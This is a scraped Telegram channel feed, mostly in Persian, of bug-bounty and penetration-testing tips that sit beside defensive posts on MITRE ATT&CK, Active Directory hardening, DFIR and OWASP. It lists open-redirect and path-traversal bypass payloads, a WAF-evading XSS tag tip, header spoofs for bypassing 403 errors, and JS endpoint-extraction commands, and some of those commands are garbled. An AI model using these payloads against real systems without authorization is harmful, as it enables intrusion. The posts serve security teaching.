Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
هفتم آبانماه، «روز کوروش بزرگ» بر همه ایرانیان و ایرانی‌تباران فرخنده و همایون باد.

کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران‌ دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.

ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر

متن آرامگاه کوروش بزرگ
@TryHackBox
15👎2
ماتریس تاکتیک‌های MITRE ATT&CK
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان می‌دهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار می‌برند.

✍️نویسنده
@TryHackBox | The Chaos

#MITRE #Kill_Chain #Hacking #CyberSecurity
🔥7👍2
🗺 حمله سایبری یک فرآیند مرحله‌به‌مرحله است. مهاجم از جمع‌آوری اطلاعات شروع می‌کند، Tools می‌سازد، نفوذ می‌کند، در سیستم پنهان می‌شود، حرکت می‌کند، داده‌ها را می‌دزدد و در نهایت آن‌ها را خارج می‌کند.

📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل می‌توانید:

--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیم‌بندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> داده‌های خود را ایمن نگه دارید (با پشتیبان‌گیری).
--> و در نهایت، اگر حمله‌ای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک می‌کند تا امنیت خود را به صورت لایه‌ای و مرحله‌ای تقویت کنید.


✍️نویسنده
@TryHackBox | The Chaos

#MITRE #Kill_Chain #Hacking #CyberSecurity
12
تمام اندپوینت ها را از یک فایل JS استخراج کنید و باگ خود را بگیرید .

- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['\"](https?:)?[\/1{1,2}[^'\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt

@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
🔥74👍1
🔖 لیستی از مطالعه باگ بانتی : مجموعه‌ ای منتخب از مقالات و منابع برای شکارچیان باگ بانتی .

https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
13
This media is not supported in your browser
VIEW IN TELEGRAM
نکته #باگ_بانتی استخراج URLهای فایل‌ های جاوااسکریپت از هر صفحه!
فراموش کن DevTools رو باز کنی از این بوک‌مارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایل‌های جاوااسکریپت لینک‌ شده رو جمع کن 
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن 
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک‌ مارکت:
javanoscript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javanoscript_urls.txt';a.click();})();

چطور استفاده کن: 
یه بوک‌مارکت جدید تو مرورگرت بساز. 
کد بالا رو تو فیلد URL بچسبون. 
به سایت هدف برو و بوک‌مارکت رو کلیک کن. 
فایل javanoscript_urls.txt با همه لینک‌های.js دانلود میشه.

حالا می‌تونی اینو به: 
LinkFinder 
SecretFinder 
JSParser 
یا تحلیل دستی بدی!
@TryHackBox
18👍2🔥2
🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی

💢 ۱. تزریق Null-byte:
   ⦁ /
google.com%00/
   ⦁ //
google.com%00

💢 ۲. تغییرات(variations) انکودینگ Base64:
   ⦁ aHR0cDovL2dvb2dsZS5jb20=
   ⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   ⦁ //base64:d3d3Lmdvb2dsZS5jb20=/

💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
   ⦁ //
GOOGLE.com/
   ⦁ //
GoOgLe.com/

💢 ۴.  توالی های UTF-8 طولانی:
   ⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
   ⦁ %C0%AF%C0%AF%2F%
2Fgoogle.com

💢 ۵. طرح‌ های انکودینگ مخلوط:
   ⦁ /%68%74%74%70://
google.com
   ⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   ⦁ //base64:%2F%
2Fgoogle.com/

💢 ۶. نوتاسیون‌ های(notations) جایگزین دامنه:
   ⦁ //
google.com@127.0.0.1/
   ⦁ //
127.0.0.1.xip.io/
   ⦁ //0x7F000001/ (IP هگزادسیمال)

💢 ۷. کاراکترهای خاص Trailing:
   ⦁ //
google.com/#/
   ⦁ //
google.com/;&/
   ⦁ //
google.com/?id=123&//

💢 ۸. فرمت آدرس IP اکتال( Octal ):
   ⦁ http://0177.0.0.1/
   ⦁ http://00177.0000.0000.0001/

💢 ۹. تغییرات آدرس IP:
   ⦁ http://3232235777 (نوتاسیون دسیمال IP)
   ⦁ http://0xC0A80001 (نوتاسیون هگز IP)
   ⦁
http://192.168.1.1/

💢 ۱۰. Path traversal با انکودینگ:
    ⦁ /..%252f..%252f..%252fetc/passwd
    ⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    ⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe

💢 ۱۱. گنجاندن پروتکل inclusion:
    ⦁
ftp://google.com/
    ⦁ javanoscript:alert(1)//
google.com

💢 ۱۲. URLهای نسبی پروتکل: 
    -:////
google.com/ 
    -:///
google.com/

💢 ۱۳. موارد لبه redirect:
    ⦁ //
google.com/?q=//bing.com/
    ⦁ //
google.com?q=https://another-site.com/

💢 ۱۴. نوتاسیون IPv6:
    ⦁ http://[::1]/
    ⦁ http://[::ffff:
192.168.1.1]/

💢 ۱۵. انکودینگ دوگانه URL:
    ⦁ %252f%
252fgoogle.com (دو بار انکود شده)
    ⦁ %
255cgoogle.com

💢 ۱۶. ترکیب traversal و انکودینگ:
    ⦁ /%2E%2E/%2E%2E/etc/passwd
    ⦁ /%2e%2e%5c%2e%2e/etc/passwd

💢 ۱۷. مبتنی بر Reverse DNS:
    ⦁
https://google.com.reverselookup.com
    ⦁ //
lookup-reversed.google.com/

💢 ۱۸. پورت‌ های غیراستاندارد:
    ⦁
http://google.com:81/
    ⦁
https://google.com:444/

💢 ۱۹. پنهان‌ سازی یونیکد در مسیرها:
    ⦁ /%E2%80%
8Egoogle.com/
    ⦁ /%C2%
A0google.com/

💢 ۲۰. پنهان‌ سازی پارامترهای کوئری:
    ⦁ //
google.com/?q=http://another-site.com/
    ⦁ //
google.com/?redirect=https://google.com/

💢 ۲۱. استفاده از سمبل @ برای userinfo:
    ⦁
https://admin:password@google.com/
    ⦁ http://
@google.com

💢 ۲۲. ترکیب userinfo و traversal:
    ⦁
https://admin:password@google.com/../../etc/passwd

@TryHackBox
#بایپس
👍12
🔖 لیست تکنیک‌ های شناسایی (recon) که تقریباً هیچ‌ کسی امتحان نمیکنه
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم‌ شده روی "localhost"
• بروت‌ فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت‌ ها با هدرهای user-agent مختلف

@TryHackBox
#باگ_بانتی #شناسایی
👍102
🟥 بسیاری از نفوذهای موفق به شبکه‌های ویندوزی، نه به دلیل باگ‌های نرم‌افزاری، بلکه به دلیل پیکربندی‌های ضعیف و اشتباه در سرویس Active Directory رخ می‌دهند.

🟦کلید اصلی امنیت، غیرفعال کردن پروتکل‌های قدیمی و ناامن
(مانند NTLM و LLMNR)

🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.

✍️نویسنده
@TryHackBox | The Chaos

#Active_Directory #AD #Windows #CyberSecurity
8👍2
سلب مسئولیت TryHackBox.pdf
679.7 KB
💢 این سلب مسئولیت شامل تمام آموزش ها، راهنماها و به طور کلی تمام محتوای منتشر شده توسط نویسنده ها در این کانال می‌ شود.

این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی‌ پردازد. به درخواست‌هایی که قوانین ایران را نقض می‌کنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفاده‌های خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی‌ توانند مسئول اقدامات شما، هر نوع که باشد، باشند.

@TryHackBox
#سلب_مسئولیت
11👍3🕊1
🔖 در تلاش برای بایپس WAF و تزریق پیلود XSS، تگ <details> را فراموش نکنید. اغلب توسط WAF مسدود نمیشود!

@TryHackBox
#باگ_بانتی #نکته
👍142👎1
🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید


Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1


@TryHackBox
#باگ_بانتی #نکته
👍13🔥5
نقشه ذهنی (MindMap) آرتیفکت‌ های DFIR #ویندوز مجموعه‌ ای از آرتیفکت‌ها که در هنگام اجرای عملیات دیجیتال فارنزیک و پاسخ به رویدادهای امنیتی (DFIR) در سیستم‌ های ویندوز، باید مورد توجه قرار گیرند.
@TryHackBox
#پاسخ_به_حادثه #dfir
👍5
فزونه‌های مرورگر می‌توانند نقطه ضعف امنیتی بزرگی باشند و توسعه‌دهندگان باید:

اصل "کمترین دسترسی" را رعایت کنند

از انتقال و ذخیره‌سازی ناامن داده‌ها جلوگیری کنند

در برابر تزریق کد و XSS محافظت کنند

وابستگی‌های شخص ثالث امن را مدیریت کنند

شفافیت کامل در مورد جمع‌آوری داده داشته باشند

این راهنمایی‌ها برای توسعه‌دهندگان افزونه و همچنین کاربرانی که می‌خواهند افزونه‌های امن‌تری انتخاب کنند، بسیار مفید است.

✍️نویسنده
@TryHackBox | The Chaos
5👏1
SIEM Use Case Categorization

@TryHackBox
👏5
Analyzing DNS Log Files Using Splunk.pdf
5.6 MB
🔖 تحلیل فایل‌ های لاگ DNS با استفاده از اسپلانک

@TryHackBox
#اسپلانک #لاگ
13👎1
OWASP TOP 10 2025.pdf
3.6 MB
📖 OWASP Top 10 (2025)

🔖 10 آسیب‌پذیری (ریسک) رایج و مهم در برنامه‌های تحت‌وب


- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions


@TryHackBox
#آسیب_پذیری #Owasp
👍111
🔊 جهت گسترش بخش آموزشی، از افرادی که علاقه و توانایی در تولید محتوای منظم دارند دعوت می‌شود برای همکاری همراه شوند.

اگر مایل به مشارکت هستید، جهت هماهنگی پیام دهید:
📩 @THBxSupport